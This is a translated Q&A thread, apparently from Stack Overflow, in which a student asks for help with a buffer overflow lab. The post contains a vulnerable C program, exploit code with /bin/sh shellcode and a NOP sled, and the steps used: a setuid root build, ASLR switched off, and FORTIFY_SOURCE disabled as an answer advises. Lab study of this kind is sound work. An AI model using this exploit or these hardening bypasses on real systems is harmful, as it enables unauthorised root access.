Проблемы Лаборатории Уязвимости переполнения буфера

Question

Проблемы Лаборатории Уязвимости переполнения буфера

У меня есть лабораторное задание, на котором я застрял. По сути, мне нужно воспользоваться переполнением буфера для генерации оболочки с привилегиями root. Я должен использовать 2 отдельных файла.c. Вот первый из них: stack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];

    //BO Vulnerability
    strcpy(buffer,str);

    return 1;
}

int main(int argc, char* argv[])
{
    char str[517];

    FILE *badfile;
    badfile = fopen("badfile","r");

    fread(str, sizeof(char),517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

Вот второй: exploit.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */
;
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

Я могу только изменить второй. Вот изменения, которые я сделал:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350 

char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    char *ptr;
    long *a_ptr,ret;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(shellcode);
    int buffSize = sizeof(buffer);

    if(argc > 1) offset = atoi(argv[1]); //allows for command line input

    ptr=buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, buffSize);

//----------------------BEGIN FILL BUFFER----------------------\\

    ret = get_sp()+offset;
    printf("Return Address: 0x%x\n",get_sp());
    printf("Address: 0x%x\n",ret);

    ptr = buffer;
    a_ptr = (long *) ptr;

    int i;
    for (i = 0; i < 300;i+=4)
    {
        *(a_ptr++) = ret;
    }

    for(i = 486;i < codeSize + 486;++i)
    {
        buffer[i] = shellcode[i-486];
    {
    buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\


/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
}

Затем я выполнил следующее из командной строки

$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack

Однако, хотя он генерирует "плохой файл" с фактическими данными и оболочкой, он имеет только основные пользовательские привилегии. Предварительно я выполнил в корне следующее:

echo 0 > /proc/sys/kernel/randomize_va_space

Лаборатория говорит, что вместо этого мне нужно выполнить в корне следующее:

sysctl -w kernel.randomize_va_space=0

Однако, если я это сделаю, то при выполнении "стека" я получаю ошибку "недопустимая инструкция". Может ли кто-нибудь помочь мне с этим?

1

c security buffer-overflow fortify-source

Источник

user1991682 16 фев '13 в 22:51

2 ответа

Другие вопросы по тегам c security buffer-overflow fortify-source

user1991682 17 фев '13 в 23:09 2013-02-17 23:09 · Answer 1 · 2013-02-17 23:09

Я понял, в чем проблема. Мне пришлось связать Zsh с /bin/bash/. Я пропустил это, потому что думал, что должен был сделать это, только если использовал Fedora. Я использовал Ubuntu.

2

Источник

user1991682 17 фев '13 в 23:09

user608639 12 сен '14 в 13:14 2014-09-12 13:14 · Answer 2 · 2014-09-12 13:14

 strcpy(buffer, str);

Одной из вещей, которую вы должны будете рассмотреть во время тестирования, является вызов этой функции.

FORTIFY_SOURCE использует "более безопасные" варианты функций высокого риска, такие как memcpy а также strcpy, Компилятор использует более безопасные варианты, когда он может определить размер буфера назначения. Если копия превысит размер буфера назначения, то программа вызывает abort(),

Чтобы отключить FORTIFY_SOURCE для вашего тестирования, вы должны скомпилировать программу с -U_FORTIFY_SOURCE или же -D_FORTIFY_SOURCE=0,